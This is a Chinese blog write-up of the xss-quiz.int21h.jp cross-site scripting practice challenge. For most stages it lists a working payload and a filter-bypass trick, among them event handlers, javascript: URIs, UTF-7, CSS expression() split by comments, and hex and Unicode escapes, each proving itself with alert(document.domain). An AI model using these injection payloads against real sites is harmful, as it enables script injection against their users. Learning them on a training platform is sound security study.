当前位置: 开发笔记 > 编程语言 > 正文

xsschallenges平台学习

作者：奎奎201277 | 来源：互联网 | 2023-05-19 15:17

虽然在很早之前就接触过xss，有一段时间还就着一本书研究过，但是始终没有实感，掌握的也不够系统，所以现在借着这几个平台再学习一遍首先来玩一玩xsschallenge平台第

虽然在很早之前就接触过xss，有一段时间还就着一本书研究过，但是始终没有实感，掌握的也不够系统，所以现在借着这几个平台再学习一遍

首先来玩一玩xss challenge平台

第一关：http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9

第二关：http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1

提示：close the current tag and add SCRIPT tag...

第三关：http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f6

提示：The input in text box is properly escaped.

尝试输入查看源码发现<>被转义了，于是抓包在country的位置插入xss

成功

第四关：http://xss-quiz.int21h.jp/stage_4.php?sid=be5650b31307cf0ca1927eae2e4b755d72a4162c

提示：invisible input field

尝试在search和country处插入xss，但是查看源码发现都被转义了

同时，在抓到的包中发现存在参数p3，于是尝试在p3处插入语句，出错了，看了下源码，发现需要闭合

再来一次，成功

在源码中可以看到，改了之后的语句成功的闭合了input

第五关：http://xss-quiz.int21h.jp/stage--5.php?sid=92e1efdf82ec7681dc71fd4b5b15470cce1bbe27

提示：length limited text box

尝试在search处插入xss，发现存在输入长度的限定，于是想到可以用burp抓包，然后再修改search的值

但同样的这里也需要闭合，修改一下再发一次

成功了

还有一种方法，直接改maxlength=15

第六关：http://xss-quiz.int21h.jp/stage-no6.php?sid=10284e95452262a58b13c86015336f4489b6152e

提示：event handler attributes

输入"><script>alert(document.domain)script><发现“<>”被过滤

那么可以用onclick在input中触发：" Onclick=alert(document.domain) id="a

然后点击输入框

第七关：http://xss-quiz.int21h.jp/stage07.php?sid=2e71a47a9c7061dcce2b9205b52f4252bd53b443

提示：nearly the same... but a bit more tricky.

和上一关一样，这里的"<>都被转义了

但事实上，用" Onclick=alert(document.domain)还是可以插入，因为前面的"不影响后面的onlick点击事件

还有一种方法：1 Onmouseover=alert(document.domain);

onmouseover：事件会在鼠标指针移动到指定的元素上时发生。

第八关：http://xss-quiz.int21h.jp/stage008.php?sid=8407d42ea5cf46b072f5a358abffa591a449a2ba

提示：the 'Javascript' scheme.

scheme：属性设置或返回用于解释 content 属性的值的格式

也就是，用js的伪协议，当点击链接的时候弹出窗口

第九关：http://xss-quiz.int21h.jp/stage_09.php?sid=fcf3010be4306306e9668ee51b9d6916c0b3e129

提示：UTF-7 XSS

"<>都被转义了，当然也不能用onmouseover和onclick，根据提示，用UTF-7编码解码工具，将" Onmousemove="alert(document.domain)转为UTF-7编码：

p1=1%2bACI- Onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7

这个对使用的IE浏览器有一定的限制，大部分浏览器都已经修复了这个漏洞，但IE7还没有

因为我的实验环境没有IE7，所以这里直接用的另一个简单粗暴的方法：

firebug是很强大的...

第十关：http://xss-quiz.int21h.jp/stage00010.php?sid=718360225fa9356a42c30995f38b5142c3496f6a

提示：s/domain//g;

很尴尬，他把domain过滤了

但是可以这样，很常见的方过滤方式：

第十一关：http://xss-quiz.int21h.jp/stage11th.php?sid=4a4c328baf358d9bf01befc79228e70d25549025

提示：s/script/xscript/ig;" and "s/on[a-z]+=/Onxxx=/ig;" and "s/style=/stxxx=/ig;

对script进行了过滤

试试onclick和onmouseover，还是不行

于是想到可以用标签：">here<"但是，因为对script做了过滤，所以要将script中的某个字符转为unicode编码，或者可以插入&＃09;不可见字符

第十二关：http://xss-quiz.int21h.jp/stage_no012.php?sid=66a49c46b3d8e490003681f359c7b8b14ba174c8

提示：s/[\x00-\x20\<\>\"\']//g;

<>"被过滤，根据提示可以知道x00-，x20，<，>，"，'都被过滤了，但是`还没被过滤，于是可以用`加上onclick,onmouseover,onfocus均可，还有一个前提是IE，只有IE才有这个特性

第十三关：http://xss-quiz.int21h.jp/stage13_0.php?sid=ea59af045ae260dd938d73d6cbbd1c92a6806e06

提示：style attribute

在CSS样式中利用expression实现Javascript中的onmouseover或onmouseout事件，同样前提是IE

aa:expression(Onmouseover=function(){alert(document.domain)})

还有一种：

background-color:#f00;background:url("Javascript:alert(document.domain);");

第十四关：http://xss-quiz.int21h.jp/stage-_-14.php?sid=88e5796eaebea97fe2b0cd79df9fbc9edad3ab9e

提示：s/(url|script|eval|expression)/xxx/ig;

这里过滤了expression，url，eval，script，但是通过加入注释符可绕过：here:expre/**/ssion(Onmouseover=function(){alert(document.domain)})

或者：here:expre/**/ssion(window.x?0:(alert(document.domain),window.x=1));

还有几种绕过过滤的方法：加\，加\0，将e转码为\0056

第十五关：http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403

提示：document.write();

被过滤

有几种方过滤的方法：

第一种：换成16进制编码\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

第二种：换成Unicode编码\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

第十六关：http://xss-quiz.int21h.jp/stage00000016.php?sid=d3e7f2565164c8482f758c4a887073bc36bccc45

提示：document.write();" and "s/\\x/\\\\x/ig;

第一种：换成Unicode编码\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

第二种：换成十进制\\74script\\76ealert(document.domain);\\74/script\\76

第十七关：http://xss-quiz.int21h.jp/stage-No17.php?sid=a207c91d7b4cb2634e277df104c853554347e8ca

提示：multi-byte character

思路类似于宽字节注入，利用特殊字节吃掉双引号，于是抓包修改p1，p2

p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

第十八关：http://xss-quiz.int21h.jp/stage__No18.php?sid=b23d6719a639f5655a2966a2f5ade6ec86841851

提示：us-ascii high bit issue

将每个字符的二进制最高位置为1，然后再转为16进制

故"><script>alert(document.domain)scirpt> 就转换为%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE

但是前提还是用旧的IE版本IE5,6

第十九关： http://xss-quiz.int21h.jp/stage_--19.php?sid=8e654fc6c2fe93f2c8bd38fbc6ad6b1588d859c7

提示：Twitter DomXss at Sep 24, 2010

参考文献：

http://blog.csdn.net/nixawk/article/details/28038509

http://www.2cto.com/article/201509/441858.html

http://blog.csdn.net/emaste_r/article/details/16988167

推荐阅读

int
POJ 2482 星空中的星星：利用线段树与扫描线算法解决

在《POJ 2482 星空中的星星》问题中，通过运用线段树和扫描线算法，可以高效地解决星星在窗口内的计数问题。该方法不仅能够快速处理大规模数据，还能确保时间复杂度的最优性，适用于各种复杂的星空模拟场景。 ... [详细]

蜡笔小新 2024-11-09 12:09:08
java
解决Bootstrap DataTable Ajax请求重复问题

在最近的一个项目中，我们使用了JQuery DataTable进行数据展示，虽然使用起来非常方便，但在测试过程中发现了一个问题：当查询条件改变时，有时查询结果的数据不正确。通过FireBug调试发现，点击搜索按钮时，会发送两次Ajax请求，一次是原条件的请求，一次是新条件的请求。 ... [详细]

蜡笔小新 2024-11-12 13:59:27
js
Android平台下的视频监控系统优化与应用

在Android平台上，视频监控系统的优化与应用具有重要意义。尽管已有相关示例（如http:www.open-open.comlibviewopen1346400423609.html）展示了基本的监控功能实现，但若要提升系统的稳定性和性能，仍需进行深入研究和优化。本文探讨了如何通过改进算法、优化网络传输和增强用户界面来提高Android视频监控系统的整体效能，以满足更复杂的应用需求。 ... [详细]

蜡笔小新 2024-11-08 12:27:10
js
Framework7：构建跨平台移动应用的高效框架

Framework7 是一个开源免费的框架，适用于开发混合移动应用（原生与HTML混合）或iOS&Android风格的Web应用。此外，它还可以作为原型开发工具，帮助开发者快速创建应用原型。 ... [详细]

蜡笔小新 2024-11-12 14:47:56
int
思科IOS XE与ISE集成实现TACACS认证配置

本文详细介绍了如何在思科IOS XE设备上配置TACACS认证，并通过ISE（Identity Services Engine）进行用户管理和授权。配置包括网络拓扑、设备设置和ISE端的具体步骤。 ... [详细]

蜡笔小新 2024-11-12 13:17:06
filter
CentOS 7 中 iptables 过滤表实例与 NAT 表应用详解

在 CentOS 7 系统中，iptables 的过滤表和 NAT 表具有重要的应用价值。本文通过具体实例详细介绍了如何配置 iptables 的过滤表，包括编写脚本文件 `/usr/local/sbin/iptables.sh`，并使用 `iptables -F` 清空现有规则。此外，还深入探讨了 NAT 表的配置方法，帮助读者更好地理解和应用这些网络防火墙技术。 ... [详细]

蜡笔小新 2024-11-11 18:33:22
int
LeetCode 有效回文串 II：深入解析与优化算法

在 LeetCode 的“有效回文串 II”问题中，给定一个非空字符串 `s`，允许删除最多一个字符。本篇深入解析了如何判断删除一个字符后，字符串是否能成为回文串，并提出了高效的优化算法。通过详细的分析和代码实现，本文提供了多种解决方案，帮助读者更好地理解和应用这一算法。 ... [详细]

蜡笔小新 2024-11-11 17:40:42
int
【Python 实战：汇率转换器 v1.02】

本项目通过Python编程实现了一个简单的汇率转换器v1.02。主要内容包括：1. Python的基本语法元素：（1）缩进：用于表示代码的层次结构，是Python中定义程序框架的唯一方式；（2）注释：提供开发者说明信息，不参与实际运行，通常每个代码块添加一个注释；（3）常量和变量：用于存储和操作数据，是程序执行过程中的重要组成部分。此外，项目还涉及了函数定义、用户输入处理和异常捕获等高级特性，以确保程序的健壮性和易用性。 ... [详细]

蜡笔小新 2024-11-11 16:34:26
int
算法精解与应用分析

二分查找算法详解与应用分析：本文深入探讨了二分查找算法的实现细节及其在实际问题中的应用。通过定义 `binary_search` 函数，详细介绍了算法的逻辑流程，包括初始化上下界、循环条件以及中间值的计算方法。此外，还讨论了该算法的时间复杂度和空间复杂度，并提供了多个应用场景示例，帮助读者更好地理解和掌握这一高效查找技术。 ... [详细]

蜡笔小新 2024-11-10 14:35:25
int
WordPress Duplicator 0.4.4 版本存在跨站脚本攻击漏洞分析

在对WordPress Duplicator插件0.4.4版本的安全评估中，发现其存在跨站脚本（XSS）攻击漏洞。此漏洞可能被利用进行恶意操作，建议用户及时更新至最新版本以确保系统安全。测试方法仅限于安全研究和教学目的，使用时需自行承担风险。漏洞编号：HTB23162。 ... [详细]

蜡笔小新 2024-11-10 13:16:43
int
Linux网络配置详解：Firewalld与Netfilter机制解析及iptables应用

在Linux系统中，网络配置是至关重要的任务之一。本文详细解析了Firewalld和Netfilter机制，并探讨了iptables的应用。通过使用`ip addr show`命令来查看网卡IP地址（需要安装`iproute`包），当网卡未分配IP地址或处于关闭状态时，可以通过`ip link set`命令进行配置和激活。此外，文章还介绍了如何利用Firewalld和iptables实现网络流量控制和安全策略管理，为系统管理员提供了实用的操作指南。 ... [详细]

蜡笔小新 2024-11-09 12:37:55
int
2018 HDU 多校联合第五场 G题：Glad You Game（线段树优化解法）

题目链接：http://acm.hdu.edu.cn/showproblem.php?pid=6356在《Glad You Game》中，Steve 面临一个复杂的区间操作问题。该题可以通过线段树进行高效优化。具体来说，线段树能够快速处理区间更新和查询操作，从而大大提高了算法的效率。本文详细介绍了线段树的构建和维护方法，并给出了具体的代码实现，帮助读者更好地理解和应用这一数据结构。 ... [详细]

蜡笔小新 2024-11-08 19:17:23
int
CSS伪类详解：定义与应用

本文将深入解析CSS伪类的定义及其应用场景。CSS伪类通过为已存在的元素在特定状态下添加特殊样式，能够动态响应用户的交互行为，从而提升网页的视觉效果和用户体验。 ... [详细]

蜡笔小新 2024-11-08 17:49:37
int
NOIP2000单词接龙题目解析与学习心得

NOIP2000的单词接龙问题与常见的成语接龙游戏有异曲同工之妙。题目要求在给定的一组单词中，从指定的起始字母开始，构建最长的“单词链”。每个单词在链中最多可出现两次。本文将详细解析该题目的解法，并分享学习过程中的心得体会。 ... [详细]

蜡笔小新 2024-11-08 14:01:31
select
技术日志：使用 Ruby 爬虫抓取拉勾网职位数据并生成词云分析报告

技术日志：使用 Ruby 爬虫抓取拉勾网职位数据并生成词云分析报告 ... [详细]

蜡笔小新 2024-11-07 14:33:19

奎奎201277

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章